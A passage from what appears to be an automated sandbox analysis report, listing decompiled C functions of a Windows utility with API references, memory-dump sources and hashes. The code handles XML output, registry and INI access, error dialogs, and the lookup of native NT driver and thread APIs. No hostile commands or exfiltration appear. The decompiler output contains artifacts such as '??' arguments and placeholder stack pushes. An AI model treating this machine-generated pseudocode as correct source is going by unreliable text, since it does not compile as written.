                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                      • String ID:
                                                                                      • API String ID: 19018683-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 50%
                                                                                      			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				void _v514;
                                                                                      				signed short _v516;
                                                                                      				signed short* _t34;
                                                                                      				signed int _t37;
                                                                                      				void* _t40;
                                                                                      				signed short* _t44;
                                                                                      				void* _t46;
                                                                                      
                                                                                      				_t40 = __edi;
                                                                                      				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                      				_t37 = 0;
                                                                                      				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_v516 = _v516 & 0x00000000;
                                                                                      						memset( &_v514, 0, 0x1fc);
                                                                                      						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                      						_t44 =  &_v516;
                                                                                      						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                      						_t34 = _t44;
                                                                                      						_push(_t34);
                                                                                      						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                      						_push(_t34);
                                                                                      						_push(L"<%s>%s</%s>\r\n");
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                      						L0040B1EC();
                                                                                      						_t46 = _t46 + 0x24;
                                                                                      						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                      						_t37 = _t37 + 1;
                                                                                      					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                      			}











                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004079DB
                                                                                        • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407A25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                      • API String ID: 1775345501-2769808009
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E0040467A(void* __edi) {
                                                                                      				signed int _v8;
                                                                                      				void* _v12;
                                                                                      				void* _v16;
                                                                                      				void _v2062;
                                                                                      				short _v2064;
                                                                                      				int _t16;
                                                                                      
                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                      				_t16 = E004043F8( &_v12, 0x20019);
                                                                                      				if(_t16 == 0) {
                                                                                      					_v2064 = _v2064 & _t16;
                                                                                      					memset( &_v2062, _t16, 0x7fe);
                                                                                      					_push(__edi + 0x20a);
                                                                                      					_push(L"%s\\shell\\%s");
                                                                                      					_push(0x3ff);
                                                                                      					_push( &_v2064);
                                                                                      					L0040B1EC();
                                                                                      					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                      						_v8 = 1;
                                                                                      						RegCloseKey(_v16);
                                                                                      					}
                                                                                      				}
                                                                                      				return _v8;
                                                                                      			}










                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004046AF
                                                                                      • _snwprintf.MSVCRT ref: 004046CD
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: CloseOpen_snwprintfmemset
                                                                                      • String ID: %s\shell\%s
                                                                                      • API String ID: 1458959524-3196117466
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 16%
                                                                                      			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                      				signed short _v131076;
                                                                                      
                                                                                      				_t25 = __esi;
                                                                                      				E0040B550(0x20000, __ecx);
                                                                                      				if(_a4 == 0) {
                                                                                      					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                      				} else {
                                                                                      					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                      						_push(_a24);
                                                                                      					} else {
                                                                                      						_v131076 = _v131076 & 0x00000000;
                                                                                      						_push(__esi);
                                                                                      						_push(L"\"%s\"");
                                                                                      						_push(0xfffe);
                                                                                      						_push( &_v131076);
                                                                                      						L0040B1EC();
                                                                                      						_push(_a24);
                                                                                      						_push( &_v131076);
                                                                                      					}
                                                                                      					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                      				}
                                                                                      			}




                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409D79
                                                                                      • _snwprintf.MSVCRT ref: 00409D9E
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                      • String ID: "%s"
                                                                                      • API String ID: 1343145685-3297466227
                                                                                      • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                      • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 38%
                                                                                      			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                      				char _v2052;
                                                                                      				short _v4100;
                                                                                      				void* __edi;
                                                                                      				long _t15;
                                                                                      				long _t16;
                                                                                      
                                                                                      				_t15 = __ecx;
                                                                                      				E0040B550(0x1000, __ecx);
                                                                                      				_t16 = _t15;
                                                                                      				if(_t16 == 0) {
                                                                                      					_t16 = GetLastError();
                                                                                      				}
                                                                                      				E00404706(_t16,  &_v2052);
                                                                                      				_push( &_v2052);
                                                                                      				_push(_t16);
                                                                                      				_push(L"Error %d: %s");
                                                                                      				_push(0x400);
                                                                                      				_push( &_v4100);
                                                                                      				L0040B1EC();
                                                                                      				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                      			}








                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                      • _snwprintf.MSVCRT ref: 00404813
                                                                                      • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                      • String ID: Error$Error %d: %s
                                                                                      • API String ID: 313946961-1552265934
                                                                                      • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                      • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                      				void* _v8;
                                                                                      				signed int _v12;
                                                                                      				void* __ebx;
                                                                                      				void* __ecx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t74;
                                                                                      				signed int _t76;
                                                                                      				signed short _t85;
                                                                                      				signed int _t87;
                                                                                      				intOrPtr _t88;
                                                                                      				signed short _t93;
                                                                                      				void* _t95;
                                                                                      				signed int _t124;
                                                                                      				signed int _t126;
                                                                                      				signed int _t128;
                                                                                      				intOrPtr* _t131;
                                                                                      				signed int _t135;
                                                                                      				signed int _t137;
                                                                                      				signed int _t138;
                                                                                      				void* _t141;
                                                                                      				void* _t142;
                                                                                      				void* _t146;
                                                                                      
                                                                                      				_t142 = __eflags;
                                                                                      				_push(_t102);
                                                                                      				_t131 = __eax;
                                                                                      				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                      				E00406746(__eax);
                                                                                      				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                      				_t135 = 5;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                      				_t124 = 0x14;
                                                                                      				_t74 = _t135 * _t124;
                                                                                      				 *(_t131 + 0x2d0) = _t135;
                                                                                      				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                      				L0040B26C();
                                                                                      				 *(_t131 + 0x2d4) = _t74;
                                                                                      				_t126 = 0x14;
                                                                                      				_t76 = _t135 * _t126;
                                                                                      				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                      				L0040B26C();
                                                                                      				_t95 = 0x40f008;
                                                                                      				 *(_t131 + 0x40) = _t76;
                                                                                      				_v8 = 0x40f008;
                                                                                      				do {
                                                                                      					_t137 =  *_t95 * 0x14;
                                                                                      					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                      					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                      					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                      					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                      					_t141 = _t141 + 0x18;
                                                                                      					_v12 = _t85;
                                                                                      					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                      					if((_t85 & 0xffff0000) == 0) {
                                                                                      						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                      						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                      						_t95 = _v8;
                                                                                      						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                      					}
                                                                                      					_t95 = _t95 + 0x28;
                                                                                      					_t146 = _t95 - 0x40f0d0;
                                                                                      					_v8 = _t95;
                                                                                      				} while (_t146 < 0);
                                                                                      				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                      				_t138 = 5;
                                                                                      				_t128 = 4;
                                                                                      				_t87 = _t138 * _t128;
                                                                                      				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                      				 *(_t131 + 0x2c) = _t138;
                                                                                      				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                      				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                      				L0040B26C();
                                                                                      				_push(0xc);
                                                                                      				 *(_t131 + 0x30) = _t87;
                                                                                      				L0040B26C();
                                                                                      				_t139 = _t87;
                                                                                      				if(_t87 == 0) {
                                                                                      					_t88 = 0;
                                                                                      					__eflags = 0;
                                                                                      				} else {
                                                                                      					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                      				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                      				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                      				return E0040686C(_t131);
                                                                                      			}


























                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                      • memcpy.MSVCRT ref: 0040696D
                                                                                      • memcpy.MSVCRT ref: 0040697E
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 975042529-0
                                                                                      • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                      • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                      				int _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				void* _v20;
                                                                                      				int _v24;
                                                                                      				void _v56;
                                                                                      				char _v584;
                                                                                      				char _v588;
                                                                                      				char _v41548;
                                                                                      				void* __edi;
                                                                                      				void* _t40;
                                                                                      				void _t46;
                                                                                      				intOrPtr _t47;
                                                                                      				intOrPtr* _t64;
                                                                                      				intOrPtr* _t66;
                                                                                      				intOrPtr _t67;
                                                                                      				intOrPtr _t71;
                                                                                      				int _t77;
                                                                                      				void* _t80;
                                                                                      				void* _t81;
                                                                                      				void* _t82;
                                                                                      				void* _t83;
                                                                                      
                                                                                      				E0040B550(0xa248, __ecx);
                                                                                      				_t77 = 0;
                                                                                      				_v8 = 0;
                                                                                      				E00408E31();
                                                                                      				_t40 =  *0x41c47c;
                                                                                      				if(_t40 != 0) {
                                                                                      					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                      				}
                                                                                      				if(_v8 == _t77) {
                                                                                      					_v8 = 0x186a0;
                                                                                      				}
                                                                                      				_v8 = _v8 + 0x3e80;
                                                                                      				_push(_v8);
                                                                                      				L0040B26C();
                                                                                      				_t81 = _t40;
                                                                                      				_v20 = _t81;
                                                                                      				memset(_t81, _t77, _v8);
                                                                                      				_t83 = _t82 + 0x10;
                                                                                      				_v24 = _t77;
                                                                                      				E00408E31();
                                                                                      				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                      				L5:
                                                                                      				while(1) {
                                                                                      					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                      						L16:
                                                                                      						_t46 =  *_t81;
                                                                                      						_t77 = 0;
                                                                                      						if(_t46 == 0) {
                                                                                      							_push(_v20);
                                                                                      							L0040B272();
                                                                                      							return _t46;
                                                                                      						}
                                                                                      						_t81 = _t81 + _t46;
                                                                                      						continue;
                                                                                      					}
                                                                                      					_t47 = _a4;
                                                                                      					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                      					_v12 = _t77;
                                                                                      					_v16 = _t71;
                                                                                      					if(_t71 <= _t77) {
                                                                                      						L10:
                                                                                      						_t66 = 0;
                                                                                      						L11:
                                                                                      						if(_t66 == 0) {
                                                                                      							E004090AF( &_v588);
                                                                                      							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                      							_t32 = _t81 + 0x20; // 0x20
                                                                                      							memcpy( &_v56, _t32, 8);
                                                                                      							_t83 = _t83 + 0x10;
                                                                                      							E004099ED(_a4 + 0x28,  &_v588);
                                                                                      						} else {
                                                                                      							_t26 = _t66 + 4; // 0x4
                                                                                      							_t72 = _t26;
                                                                                      							if( *_t26 == 0) {
                                                                                      								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                      								_t28 = _t81 + 0x20; // 0x20
                                                                                      								memcpy(_t66 + 0x214, _t28, 8);
                                                                                      								_t83 = _t83 + 0x10;
                                                                                      							}
                                                                                      						}
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                      					_t80 = _t47 + 0x28;
                                                                                      					while(1) {
                                                                                      						_t64 = E00405A92(_v12, _t80);
                                                                                      						if( *_t64 == _t67) {
                                                                                      							break;
                                                                                      						}
                                                                                      						_v12 = _v12 + 1;
                                                                                      						if(_v12 < _v16) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					_t66 = _t64;
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                        • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                      • memset.MSVCRT ref: 00409805
                                                                                      • memcpy.MSVCRT ref: 0040988A
                                                                                      • memcpy.MSVCRT ref: 004098C0
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                      • String ID:
                                                                                      • API String ID: 3641025914-0
                                                                                      • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                      • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E004067AC(char** __edi) {
                                                                                      				void* __esi;
                                                                                      				void* _t9;
                                                                                      				void** _t11;
                                                                                      				char** _t15;
                                                                                      				char** _t24;
                                                                                      				void* _t25;
                                                                                      				char* _t28;
                                                                                      				char* _t29;
                                                                                      				char* _t30;
                                                                                      				char* _t31;
                                                                                      				char** _t33;
                                                                                      
                                                                                      				_t24 = __edi;
                                                                                      				 *__edi = "cf@";
                                                                                      				_t9 = E00406746(__edi);
                                                                                      				_t28 = __edi[5];
                                                                                      				if(_t28 != 0) {
                                                                                      					_t9 = E004055D1(_t9, _t28);
                                                                                      					_push(_t28);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t29 = _t24[4];
                                                                                      				if(_t29 != 0) {
                                                                                      					_t9 = E004055D1(_t9, _t29);
                                                                                      					_push(_t29);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t30 = _t24[3];
                                                                                      				if(_t30 != 0) {
                                                                                      					_t9 = E004055D1(_t9, _t30);
                                                                                      					_push(_t30);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t31 = _t24[2];
                                                                                      				if(_t31 != 0) {
                                                                                      					E004055D1(_t9, _t31);
                                                                                      					_push(_t31);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t15 = _t24;
                                                                                      				_pop(_t32);
                                                                                      				_push(_t24);
                                                                                      				_t33 = _t15;
                                                                                      				_t25 = 0;
                                                                                      				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                      					do {
                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                      						_t25 = _t25 + 1;
                                                                                      					} while (_t25 < _t33[0xd]);
                                                                                      				}
                                                                                      				_t11 =  *( *_t33)();
                                                                                      				free( *_t11);
                                                                                      				return _t11;
                                                                                      			}















                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                      • free.MSVCRT(00000000), ref: 00406839
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@$free
                                                                                      • String ID:
                                                                                      • API String ID: 2241099983-0
                                                                                      • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                      • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                      				intOrPtr _v12;
                                                                                      				struct tagPOINT _v20;
                                                                                      				struct tagRECT _v36;
                                                                                      				int _t27;
                                                                                      				struct HWND__* _t30;
                                                                                      				struct HWND__* _t32;
                                                                                      
                                                                                      				_t30 = _a4;
                                                                                      				if((_a8 & 0x00000001) != 0) {
                                                                                      					_t32 = GetParent(_t30);
                                                                                      					GetWindowRect(_t30,  &_v20);
                                                                                      					GetClientRect(_t32,  &_v36);
                                                                                      					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                      					_t27 = _v36.right - _v12 - _v36.left;
                                                                                      					_v20.x = _t27;
                                                                                      					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                      				}
                                                                                      				if((_a8 & 0x00000002) != 0) {
                                                                                      					E00404FBB(_t30);
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}










                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 00405D0A
                                                                                      • GetWindowRect.USER32 ref: 00405D17
                                                                                      • GetClientRect.USER32 ref: 00405D22
